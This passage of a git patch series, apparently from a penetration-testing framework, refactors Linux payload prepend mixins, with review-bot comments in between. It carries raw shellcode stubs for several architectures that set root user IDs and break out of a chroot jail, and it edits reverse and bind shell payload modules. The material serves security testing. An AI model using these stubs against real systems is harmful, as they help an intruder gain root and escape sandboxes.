"\x31\xc9" + # xorl %ecx,%ecx # + "\x31\xdb" + # xorl %ebx,%ebx # + "\x6a\x46" + # pushl $0x46 # + "\x58" + # popl %eax # + "\xcd\x80" + # int $0x80 # + "\x6a\x3d" + # pushl $0x3d # + # build dir str (ptr in ebx) + "\x89\xe3" + # movl %esp,%ebx # + # mkdir(dir) + "\x6a\x27" + # pushl $0x27 # + "\x58" + # popl %eax # + "\xcd\x80" + # int $0x80 # + # chroot(dir) + "\x89\xd9" + # movl %ebx,%ecx # + "\x58" + # popl %eax # + "\xcd\x80" + # int $0x80 # + # build ".." str (ptr in ebx) + "\x31\xc0" + # xorl %eax,%eax # + "\x50" + # pushl %eax # + + "\x66\x68\x2e\x2e" + # pushw $0x2e2e # + "\x89\xe3" + # movl %esp,%ebx # + # loop changing dir + "\x6a\x3d" + # pushl $0x1e # + "\x59" + # popl %ecx # + "\xb0\x0c" + # movb $0xc,%al # + "\xcd\x80" + # int $0x80 # + "\xe2\xfa" + # loop -6 # + # final chroot + "\x6a\x3d" + # pushl $0x3d # + "\x89\xd9" + # movl %ebx,%ecx # + "\x58" + # popl %eax # + "\xcd\x80" # int $0x80 # + } + end + + def appends_map + { + # exit(0) + 'AppendExit' => "\x31\xdb" + # xorl %ebx,%ebx # + "\x6a\x01" + # pushl $0x01 # + "\x58" + # popl %eax # + "\xcd\x80" # int $0x80 # + } + end + end +end \ No newline at end of file From 753447c7f772979e3f96ea388fbb971f2fcf5663 Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Thu, 19 Dec 2024 12:13:55 -0500 Subject: [PATCH 02/12] fix: updating ppc/shell to use the new mixin structure --- modules/payloads/singles/linux/ppc/shell_bind_tcp.rb | 2 +- modules/payloads/singles/linux/ppc/shell_find_port.rb | 2 +- modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb b/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb index d40e531e5486..6935f809ee44 100644 --- a/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb 
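Review bot: `Msf::Payload::Linux::X86::Prepends` does not `include Msf::Payload::Linux::Prepends`, unlike the Armle, Ppc and X64 modules in this same patch, so a payload that includes only the X86 module gets neither the option registration from `initialize` nor `apply_prepends`; add `include Msf::Payload::Linux::Prepends` directly under the module line. In the PrependChrootBreak stub the comment on the loop-count push reads `# pushl $0x1e #` while the bytes are `"\x6a\x3d"` (0x3d), a mismatch carried over from the old file that is worth correcting to `# pushl $0x3d #` while the code is being moved.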
@@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 223 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::Ppc::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/ppc/shell_find_port.rb b/modules/payloads/singles/linux/ppc/shell_find_port.rb index 5246b984bb7c..5f9a1e4900e3 100644 --- a/modules/payloads/singles/linux/ppc/shell_find_port.rb +++ b/modules/payloads/singles/linux/ppc/shell_find_port.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 171 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::Ppc::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb index 42777fbcb06e..38b79f0110ac 100644 --- a/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 183 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::Ppc::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) From 4d304c65b5981542bfd41c8dd2c8a2c163bec509 Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Fri, 20 Dec 2024 04:15:41 -0500 Subject: [PATCH 03/12] fix: remove x64 directory flatting in Linux payloads --- .../payload/linux/x64/{reverse_sctp_x64.rb => reverse_sctp.rb} | 2 +- .../payload/linux/x64/{reverse_tcp_x64.rb => reverse_tcp.rb} | 2 +- lib/msf_autoload.rb | 2 +- modules/payloads/stagers/linux/x64/reverse_sctp.rb | 2 +- modules/payloads/stagers/linux/x64/reverse_tcp.rb | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) rename lib/msf/core/payload/linux/x64/{reverse_sctp_x64.rb => reverse_sctp.rb} (99%) rename lib/msf/core/payload/linux/x64/{reverse_tcp_x64.rb => reverse_tcp.rb} (99%) 
diff --git a/lib/msf/core/payload/linux/x64/reverse_sctp_x64.rb b/lib/msf/core/payload/linux/x64/reverse_sctp.rb similarity index 99% rename from lib/msf/core/payload/linux/x64/reverse_sctp_x64.rb rename to lib/msf/core/payload/linux/x64/reverse_sctp.rb index 6df4a3fc2d48..1229fe5610b5 100644 --- a/lib/msf/core/payload/linux/x64/reverse_sctp_x64.rb +++ b/lib/msf/core/payload/linux/x64/reverse_sctp.rb @@ -9,7 +9,7 @@ module Msf # ### -module Payload::Linux::ReverseSctp_x64 +module Payload::Linux::X64::ReverseSctp include Msf::Payload::TransportConfig include Msf::Payload::Linux diff --git a/lib/msf/core/payload/linux/x64/reverse_tcp_x64.rb b/lib/msf/core/payload/linux/x64/reverse_tcp.rb similarity index 99% rename from lib/msf/core/payload/linux/x64/reverse_tcp_x64.rb rename to lib/msf/core/payload/linux/x64/reverse_tcp.rb index 4bc5b6eb7502..67d94505c583 100644 --- a/lib/msf/core/payload/linux/x64/reverse_tcp_x64.rb +++ b/lib/msf/core/payload/linux/x64/reverse_tcp.rb @@ -9,7 +9,7 @@ module Msf # ### -module Payload::Linux::ReverseTcp_x64 +module Payload::Linux::X64::ReverseTcp include Msf::Payload::TransportConfig include Msf::Payload::Linux diff --git a/lib/msf_autoload.rb b/lib/msf_autoload.rb index c546aa8dc195..f192e2926431 100644 --- a/lib/msf_autoload.rb +++ b/lib/msf_autoload.rb @@ -75,7 +75,7 @@ def collapse_list "#{__dir__}/msf/core/rpc/v10", "#{__dir__}/msf/core/payload/osx/x64", "#{__dir__}/msf/core/payload/windows/x64", - "#{__dir__}/msf/core/payload/linux/x64", + # "#{__dir__}/msf/core/payload/linux/x64", "#{__dir__}/msf/core/web_services/servlet", "#{__dir__}/msf/base", "#{__dir__}/rex/parser/fs" diff --git a/modules/payloads/stagers/linux/x64/reverse_sctp.rb b/modules/payloads/stagers/linux/x64/reverse_sctp.rb index 67f2d913b59a..62b78cf2bde9 100644 --- a/modules/payloads/stagers/linux/x64/reverse_sctp.rb +++ b/modules/payloads/stagers/linux/x64/reverse_sctp.rb 
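Review bot: In `msf_autoload.rb` the `"#{__dir__}/msf/core/payload/linux/x64"` entry of `collapse_list` is commented out rather than removed, leaving a dead line in a configuration array; delete it, since the renamed `Payload::Linux::X64::ReverseSctp`/`ReverseTcp` modules require the directory to no longer be collapsed and the history already records the old value. The two renamed mixins still `include Msf::Payload::Linux`, which after the first patch of this series no longer provides prepend handling; if stagers are meant to keep the Prepend* options they would need the X64 prepends mixin instead.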
@@ -7,7 +7,7 @@ module MetasploitModule CachedSize = 136 include Msf::Payload::Stager - include Msf::Payload::Linux::ReverseSctp_x64 + include Msf::Payload::Linux::X64::ReverseSctp def initialize(info = {}) super( diff --git a/modules/payloads/stagers/linux/x64/reverse_tcp.rb b/modules/payloads/stagers/linux/x64/reverse_tcp.rb index 31c4440c3b0d..5a56e82cfcd0 100644 --- a/modules/payloads/stagers/linux/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x64/reverse_tcp.rb @@ -8,7 +8,7 @@ module MetasploitModule CachedSize = 130 include Msf::Payload::Stager - include Msf::Payload::Linux::ReverseTcp_x64 + include Msf::Payload::Linux::X64::ReverseTcp def initialize(info = {}) super(merge_info(info, From 647972b7c8f50de2d3e36bc6d5f447117ab1131f Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Fri, 20 Dec 2024 08:13:09 -0500 Subject: [PATCH 04/12] feat: add PrependSetuid for linux/aarch64 --- .../core/payload/linux/aarch64/prepends.rb | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 lib/msf/core/payload/linux/aarch64/prepends.rb diff --git a/lib/msf/core/payload/linux/aarch64/prepends.rb b/lib/msf/core/payload/linux/aarch64/prepends.rb new file mode 100644 index 000000000000..22778dcbd7ac --- /dev/null +++ b/lib/msf/core/payload/linux/aarch64/prepends.rb @@ -0,0 +1,29 @@ +module Msf + module Payload::Linux::Aarch64::Prepends + include Msf::Payload::Linux::Prepends + + def prepends_order + %w[PrependSetuid] + end + + def appends_order + %w[] + end + + def prepends_map + { + # 'PrependFork' => "", + + # setuid(0) + 'PrependSetuid' => "\xe0\x03\x1f\xaa" + # mov x0, xzr + "\x48\x12\x80\xd2" + # mov x8, #0x92 + "\x01\x00\x00\xd4" # svc 0x0 + + } + end + + def appends_map + {} + end + end +end \ No newline at end of file From 30e13c9040abaacf587e6fdcfea01ecd5df6c2c9 Mon Sep 17 00:00:00 2001 
From: dledda-r7 Date: Fri, 20 Dec 2024 08:13:52 -0500 Subject: [PATCH 05/12] fix: fix mismatch between prepend name and stub in linux/armle --- lib/msf/core/payload/linux/armle/prepends.rb | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/lib/msf/core/payload/linux/armle/prepends.rb b/lib/msf/core/payload/linux/armle/prepends.rb index 90612a220791..7fb9557a4726 100644 --- a/lib/msf/core/payload/linux/armle/prepends.rb +++ b/lib/msf/core/payload/linux/armle/prepends.rb @@ -14,17 +14,18 @@ def prepends_map { # 'PrependFork' => "", - # setresuid(0, 0, 0) - 'PrependSetresuid' => "\x00\x00\x20\xe0" + # eor r0, r0, r0 # + # + # setuid(0) + 'PrependSetuid' => "\x00\x00\x20\xe0" + # eor r0, r0, r0 # "\x17\x70\xa0\xe3" + # mov r7, #23 # "\x00\x00\x00\xef", # svc # - # setuid(0) - 'PrependSetuid' => "\x00\x00\x20\xe0" + # eor r0, r0, r0 # - "\x01\x10\x21\xe0" + # eor r1, r1, r1 # - "\x02\x20\x22\xe0" + # eor r2, r2, r2 # - "\xa4\x70\xa0\xe3" + # mov r7, #0xa4 # - "\x00\x00\x00\xef" # svc # + # setresuid(0, 0, 0) + 'PrependSetresuid' => "\x00\x00\x20\xe0" + # eor r0, r0, r0 # + "\x01\x10\x21\xe0" + # eor r1, r1, r1 # + "\x02\x20\x22\xe0" + # eor r2, r2, r2 # + "\xa4\x70\xa0\xe3" + # mov r7, #0xa4 # + "\x00\x00\x00\xef" # svc # } end From aca6613a3e414b7c9c2be3c4ac44d68d7aa37765 Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Fri, 20 Dec 2024 09:44:39 -0500 Subject: [PATCH 06/12] feat: add PrependSetreuid for linux/aarch64 --- lib/msf/core/payload/linux/aarch64/prepends.rb | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/payload/linux/aarch64/prepends.rb b/lib/msf/core/payload/linux/aarch64/prepends.rb index 22778dcbd7ac..58b00eaec44d 100644 --- a/lib/msf/core/payload/linux/aarch64/prepends.rb +++ b/lib/msf/core/payload/linux/aarch64/prepends.rb 
@@ -17,8 +17,13 @@ def prepends_map # setuid(0) 'PrependSetuid' => "\xe0\x03\x1f\xaa" + # mov x0, xzr "\x48\x12\x80\xd2" + # mov x8, #0x92 - "\x01\x00\x00\xd4" # svc 0x0 + "\x01\x00\x00\xd4", # svc 0x0 + # setreuid(0, 0) + 'PrependSetreuid' => "\xe0\x03\x1f\xaa" + # mov x0, xzr + "\xe1\x03\x1f\xaa" + # mov x1, xzr + "\x28\x12\x80\xd2" + # mov x8, #0x91 + "\x01\x00\x00\xd4" # svc 0x0 } end From ead6af8cbc720936506ecd6a5393293054dc75d8 Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Fri, 20 Dec 2024 10:16:46 -0500 Subject: [PATCH 07/12] feat: add PrependSetresuid for linux/aarch64 --- lib/msf/core/payload/linux/aarch64/prepends.rb | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/payload/linux/aarch64/prepends.rb b/lib/msf/core/payload/linux/aarch64/prepends.rb index 58b00eaec44d..93befcc45883 100644 --- a/lib/msf/core/payload/linux/aarch64/prepends.rb +++ b/lib/msf/core/payload/linux/aarch64/prepends.rb @@ -3,7 +3,7 @@ module Payload::Linux::Aarch64::Prepends include Msf::Payload::Linux::Prepends def prepends_order - %w[PrependSetuid] + %w[ PrependSetresuid PrependSetreuid PrependSetuid] end def appends_order @@ -20,10 +20,17 @@ def prepends_map "\x01\x00\x00\xd4", # svc 0x0 # setreuid(0, 0) - 'PrependSetreuid' => "\xe0\x03\x1f\xaa" + # mov x0, xzr - "\xe1\x03\x1f\xaa" + # mov x1, xzr - "\x28\x12\x80\xd2" + # mov x8, #0x91 - "\x01\x00\x00\xd4" # svc 0x0 + 'PrependSetreuid' => "\xe0\x03\x1f\xaa" + # mov x0, xzr + "\xe1\x03\x1f\xaa" + # mov x1, xzr + "\x28\x12\x80\xd2" + # mov x8, #0x91 + "\x01\x00\x00\xd4", # svc 0x0 + + # setresuid(0, 0, 0) + 'PrependSetresuid' => "\xe0\x03\x1f\xaa" + # mov x0, xzr + "\xe1\x03\x1f\xaa" + # mov x1, xzr + "\xe2\x03\x1f\xaa" + # mov x2, xzr + "\x68\x12\x80\xd2" + # mov x8, #0x93 + "\x01\x00\x00\xd4" # svc 0x0 } end From a27024eb1fc4cde474f2eb21b5684a4bdc645717 Mon Sep 17 00:00:00 2001 
From: dledda-r7 Date: Fri, 20 Dec 2024 10:18:25 -0500 Subject: [PATCH 08/12] fix: updating aarch64/shell to use the new prepends mixin --- modules/payloads/singles/linux/aarch64/shell_reverse_tcp.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/payloads/singles/linux/aarch64/shell_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/shell_reverse_tcp.rb index a15bef0f47d5..367d2d4a3d66 100644 --- a/modules/payloads/singles/linux/aarch64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/aarch64/shell_reverse_tcp.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 152 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::Aarch64::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) From edf4fca47626c99d7031c9625515c12f07ff059e Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Fri, 10 Jan 2025 07:34:59 -0500 Subject: [PATCH 09/12] chore: rubocop format fix --- .../core/payload/linux/aarch64/prepends.rb | 67 ++--- lib/msf/core/payload/linux/armle/prepends.rb | 59 ++--- lib/msf/core/payload/linux/ppc/prepends.rb | 123 ++++----- lib/msf/core/payload/linux/prepends.rb | 77 +++--- lib/msf/core/payload/linux/x64/prepends.rb | 238 +++++++++--------- lib/msf/core/payload/linux/x86/prepends.rb | 213 ++++++++-------- 6 files changed, 391 insertions(+), 386 deletions(-) diff --git a/lib/msf/core/payload/linux/aarch64/prepends.rb b/lib/msf/core/payload/linux/aarch64/prepends.rb index 93befcc45883..e03ad3422b26 100644 --- a/lib/msf/core/payload/linux/aarch64/prepends.rb +++ b/lib/msf/core/payload/linux/aarch64/prepends.rb 
@@ -1,41 +1,42 @@ -module Msf - module Payload::Linux::Aarch64::Prepends - include Msf::Payload::Linux::Prepends +# +# Linux aarch64 prepends +# +module Msf::Payload::Linux::Aarch64::Prepends + include Msf::Payload::Linux::Prepends - def prepends_order - %w[ PrependSetresuid PrependSetreuid PrependSetuid] - end + def prepends_order + %w[PrependSetresuid PrependSetreuid PrependSetuid] + end - def appends_order - %w[] - end + def appends_order + %w[] + end - def prepends_map - { - # 'PrependFork' => "", + def prepends_map + { + # 'PrependFork' => "", - # setuid(0) - 'PrependSetuid' => "\xe0\x03\x1f\xaa" + # mov x0, xzr - "\x48\x12\x80\xd2" + # mov x8, #0x92 - "\x01\x00\x00\xd4", # svc 0x0 + # setuid(0) + 'PrependSetuid' => "\xe0\x03\x1f\xaa" + # mov x0, xzr + "\x48\x12\x80\xd2" + # mov x8, #0x92 + "\x01\x00\x00\xd4", # svc 0x0 - # setreuid(0, 0) - 'PrependSetreuid' => "\xe0\x03\x1f\xaa" + # mov x0, xzr - "\xe1\x03\x1f\xaa" + # mov x1, xzr - "\x28\x12\x80\xd2" + # mov x8, #0x91 - "\x01\x00\x00\xd4", # svc 0x0 + # setreuid(0, 0) + 'PrependSetreuid' => "\xe0\x03\x1f\xaa" + # mov x0, xzr + "\xe1\x03\x1f\xaa" + # mov x1, xzr + "\x28\x12\x80\xd2" + # mov x8, #0x91 + "\x01\x00\x00\xd4", # svc 0x0 - # setresuid(0, 0, 0) - 'PrependSetresuid' => "\xe0\x03\x1f\xaa" + # mov x0, xzr - "\xe1\x03\x1f\xaa" + # mov x1, xzr - "\xe2\x03\x1f\xaa" + # mov x2, xzr - "\x68\x12\x80\xd2" + # mov x8, #0x93 - "\x01\x00\x00\xd4" # svc 0x0 - } - end + # setresuid(0, 0, 0) + 'PrependSetresuid' => "\xe0\x03\x1f\xaa" + # mov x0, xzr + "\xe1\x03\x1f\xaa" + # mov x1, xzr + "\xe2\x03\x1f\xaa" + # mov x2, xzr + "\x68\x12\x80\xd2" + # mov x8, #0x93 + "\x01\x00\x00\xd4" # svc 0x0 + } + end - def appends_map - {} - end + def appends_map + {} end -end \ No newline at end of file +end diff --git a/lib/msf/core/payload/linux/armle/prepends.rb b/lib/msf/core/payload/linux/armle/prepends.rb index 7fb9557a4726..2e89f6c428fe 100644 --- a/lib/msf/core/payload/linux/armle/prepends.rb 
+++ b/lib/msf/core/payload/linux/armle/prepends.rb @@ -1,36 +1,37 @@ -module Msf - module Payload::Linux::Armle::Prepends - include Msf::Payload::Linux::Prepends +# +# Linux armle prepends +# +module Msf::Payload::Linux::Armle::Prepends + include Msf::Payload::Linux::Prepends - def prepends_order - %w[PrependSetresuid PrependSetuid] - end + def prepends_order + %w[PrependSetresuid PrependSetuid] + end - def appends_order - %w[] - end + def appends_order + %w[] + end - def prepends_map - { - # 'PrependFork' => "", + def prepends_map + { + # 'PrependFork' => "", - # - # setuid(0) - 'PrependSetuid' => "\x00\x00\x20\xe0" + # eor r0, r0, r0 # - "\x17\x70\xa0\xe3" + # mov r7, #23 # - "\x00\x00\x00\xef", # svc # + # + # setuid(0) + 'PrependSetuid' => "\x00\x00\x20\xe0" + # eor r0, r0, r0 # + "\x17\x70\xa0\xe3" + # mov r7, #23 # + "\x00\x00\x00\xef", # svc # - # setresuid(0, 0, 0) - 'PrependSetresuid' => "\x00\x00\x20\xe0" + # eor r0, r0, r0 # - "\x01\x10\x21\xe0" + # eor r1, r1, r1 # - "\x02\x20\x22\xe0" + # eor r2, r2, r2 # - "\xa4\x70\xa0\xe3" + # mov r7, #0xa4 # - "\x00\x00\x00\xef" # svc # - } - end + # setresuid(0, 0, 0) + 'PrependSetresuid' => "\x00\x00\x20\xe0" + # eor r0, r0, r0 # + "\x01\x10\x21\xe0" + # eor r1, r1, r1 # + "\x02\x20\x22\xe0" + # eor r2, r2, r2 # + "\xa4\x70\xa0\xe3" + # mov r7, #0xa4 # + "\x00\x00\x00\xef" # svc # + } + end - def appends_map - {} - end + def appends_map + {} end -end \ No newline at end of file +end diff --git a/lib/msf/core/payload/linux/ppc/prepends.rb b/lib/msf/core/payload/linux/ppc/prepends.rb index 9379735f036d..0ea73cf42c64 100644 --- a/lib/msf/core/payload/linux/ppc/prepends.rb +++ b/lib/msf/core/payload/linux/ppc/prepends.rb 
@@ -1,74 +1,75 @@ -module Msf - module Payload::Linux::Ppc::Prepends - include Msf::Payload::Linux::Prepends +# +# Linux ppc prepends +# +module Msf::Payload::Linux::Ppc::Prepends + include Msf::Payload::Linux::Prepends - def prepends_order - %w[PrependSetresuid PrependSetreuid PrependSetuid PrependSetresgid PrependSetregid PrependSetgid] - end + def prepends_order + %w[PrependSetresuid PrependSetreuid PrependSetuid PrependSetresgid PrependSetregid PrependSetgid] + end + + def appends_order + %w[AppendExit] + end - def appends_order - %w[AppendExit] - end + def prepends_map + { + # 'PrependFork' => "", - def prepends_map - { - # 'PrependFork' => "", + # setresuid(0, 0, 0) + 'PrependSetresuid' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\xa5\x2a\x78" + # xor r5,r5,r5 # + "\x7c\x84\x22\x78" + # xor r4,r4,r4 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\xa5" + # addi r0,r31,-347 # + "\x44\xff\xff\x02", # sc # - # setresuid(0, 0, 0) - 'PrependSetresuid' => "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\xa5\x2a\x78" + # xor r5,r5,r5 # - "\x7c\x84\x22\x78" + # xor r4,r4,r4 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\xa5" + # addi r0,r31,-347 # - "\x44\xff\xff\x02", # sc # + # setreuid(0, 0) + 'PrependSetreuid' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\x84\x22\x78" + # xor r4,r4,r4 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\x47" + # addi r0,r31,-441 # + "\x44\xff\xff\x02", # sc # - # setreuid(0, 0) - 'PrependSetreuid' => "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\x84\x22\x78" + # xor r4,r4,r4 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\x47" + # addi r0,r31,-441 # - "\x44\xff\xff\x02", # sc # + # setuid(0) + 'PrependSetuid' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\x18" + # addi r0,r31,-488 # + "\x44\xff\xff\x02", # sc # - # setuid(0) - 'PrependSetuid' => "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\x18" + # addi 
r0,r31,-488 # - "\x44\xff\xff\x02", # sc # + # setresgid(0, 0, 0) + 'PrependSetresgid' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\xa5\x2a\x78" + # xor r5,r5,r5 # + "\x7c\x84\x22\x78" + # xor r4,r4,r4 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\xab" + # addi r0,r31,-341 # + "\x44\xff\xff\x02", # sc # - # setresgid(0, 0, 0) - 'PrependSetresgid' => "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\xa5\x2a\x78" + # xor r5,r5,r5 # - "\x7c\x84\x22\x78" + # xor r4,r4,r4 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\xab" + # addi r0,r31,-341 # - "\x44\xff\xff\x02", # sc # + # setregid(0, 0) + 'PrependSetregid' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\x84\x22\x78" + # xor r4,r4,r4 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\x48" + # addi r0,r31,-440 # + "\x44\xff\xff\x02", # sc # - # setregid(0, 0) - 'PrependSetregid' => "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\x84\x22\x78" + # xor r4,r4,r4 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\x48" + # addi r0,r31,-440 # - "\x44\xff\xff\x02", # sc # + # setgid(0) + 'PrependSetgid' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\x2f" + # addi r0,r31,-465 # + "\x44\xff\xff\x02" # sc # - # setgid(0) - 'PrependSetgid' => "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\x2f" + # addi r0,r31,-465 # - "\x44\xff\xff\x02" # sc # - # setreuid(0, 0) = break chroot - # 'PrependChrootBreak' => - } - end + # 'PrependChrootBreak' => + } + end - def appends_map - { + def appends_map + { # exit(0) - 'AppendExit' => "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\x02" + # addi r0,r31,-510 # - "\x44\xff\xff\x02" # sc # - } - end + 'AppendExit' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\x02" + # addi r0,r31,-510 # + "\x44\xff\xff\x02" # sc # + } end -end \ No newline at end of file +end 
diff --git a/lib/msf/core/payload/linux/prepends.rb b/lib/msf/core/payload/linux/prepends.rb index 05c9e658fe2a..a20a120ae362 100644 --- a/lib/msf/core/payload/linux/prepends.rb +++ b/lib/msf/core/payload/linux/prepends.rb 
@@ -1,46 +1,45 @@ +# +# Linux Preprends shared logic. +# +module Msf::Payload::Linux::Prepends + def initialize(info) + super(info) + register_prepend_options + end -module Msf - module Payload::Linux::Prepends - - def initialize(info) - super(info) - register_prepend_options + def register_prepend_options + all_options = { + 'PrependFork' => [false, 'Prepend a stub that starts the payload in its own process via fork', 'false'], + 'PrependSetresuid' => [false, 'Prepend a stub that executes the setresuid(0, 0, 0) system call', 'false'], + 'PrependSetreuid' => [false, 'Prepend a stub that executes the setreuid(0, 0) system call', 'false'], + 'PrependSetuid' => [false, 'Prepend a stub that executes the setuid(0) system call', 'false'], + 'PrependSetresgid' => [false, 'Prepend a stub that executes the setresgid(0, 0, 0) system call', 'false'], + 'PrependSetregid' => [false, 'Prepend a stub that executes the setregid(0, 0) system call', 'false'], + 'PrependSetgid' => [false, 'Prepend a stub that executes the setgid(0) system call', 'false'], + 'PrependChrootBreak' => [false, 'Prepend a stub that will break out of a chroot (includes setreuid to root)', 'false'], + 'AppendExit' => [false, 'Prepend a stub that will break out of a chroot (includes setreuid to root)', 'false'] + } + avaiable_options = [] + for prepend in prepends_order + avaiable_options.append(Msf::OptBool.new(prepend, all_options.fetch(prepend))) end - - def register_prepend_options - all_options = { - 'PrependFork' => [false, 'Prepend a stub that starts the payload in its own process via fork', 'false'], - 'PrependSetresuid' => [false, 'Prepend a stub that executes the setresuid(0, 0, 0) system call', 'false'], - 'PrependSetreuid' => [false, 'Prepend a stub that executes the setreuid(0, 0) system call', 'false'], - 'PrependSetuid' => [false, 'Prepend a stub that executes the setuid(0) system call', 'false'], - 'PrependSetresgid' => [false, 'Prepend a stub that executes the setresgid(0, 0, 0) system call', 
'false'], - 'PrependSetregid' => [false, 'Prepend a stub that executes the setregid(0, 0) system call', 'false'], - 'PrependSetgid' => [false, 'Prepend a stub that executes the setgid(0) system call', 'false'], - 'PrependChrootBreak' => [false, 'Prepend a stub that will break out of a chroot (includes setreuid to root)', 'false'], - 'AppendExit' => [false, 'Prepend a stub that will break out of a chroot (includes setreuid to root)', 'false'] - } - avaiable_options = [] - for prepend in prepends_order - avaiable_options.append(Msf::OptBool.new(prepend, all_options.fetch(prepend))) - end - for append in appends_order - avaiable_options.append(Msf::OptBool.new(append, all_options.fetch(append))) - end - register_advanced_options(avaiable_options, Msf::Payload::Linux) + for append in appends_order + avaiable_options.append(Msf::OptBool.new(append, all_options.fetch(append))) end + register_advanced_options(avaiable_options, Msf::Payload::Linux) + end - def apply_prepends(buf) - pre = '' - app = '' - for name in prepends_order.each - pre << prepends_map.fetch(name) if datastore[name] - end - for name in appends_order.each - app << appends_map.fetch(name) if datastore[name] - end - pre.force_encoding('ASCII-8BIT') + - buf.force_encoding('ASCII-8BIT') + - app.force_encoding('ASCII-8BIT') + def apply_prepends(buf) + pre = '' + app = '' + for name in prepends_order.each + pre << prepends_map.fetch(name) if datastore[name] + end + for name in appends_order.each + app << appends_map.fetch(name) if datastore[name] end + pre.force_encoding('ASCII-8BIT') + + buf.force_encoding('ASCII-8BIT') + + app.force_encoding('ASCII-8BIT') end end diff --git a/lib/msf/core/payload/linux/x64/prepends.rb b/lib/msf/core/payload/linux/x64/prepends.rb index 8a1ae58a467a..bffc48ba48fd 100644 --- a/lib/msf/core/payload/linux/x64/prepends.rb +++ b/lib/msf/core/payload/linux/x64/prepends.rb 
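Review bot: The `AppendExit` entry in `all_options` carries the chroot-break description copied from the line above it, so the advanced option users see for AppendExit describes the wrong behaviour; it should read `'AppendExit' => [false, 'Append a stub that executes the exit(0) system call', 'false']`. The mixin also depends on four hooks (`prepends_order`, `appends_order`, `prepends_map`, `appends_map`) that every arch-specific includer must define, and `all_options.fetch`/`prepends_map.fetch` will raise `KeyError` when the payload is instantiated or generated if an includer lists a name it does not provide, so the module header comment should state that contract instead of just "Linux Preprends shared logic". Minor: `avaiable_options` is misspelled, the `for … in` loops (including `for name in prepends_order.each`) would be idiomatic as `each`/`map`, and `buf.force_encoding('ASCII-8BIT')` mutates the caller's string in place rather than working on a copy.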
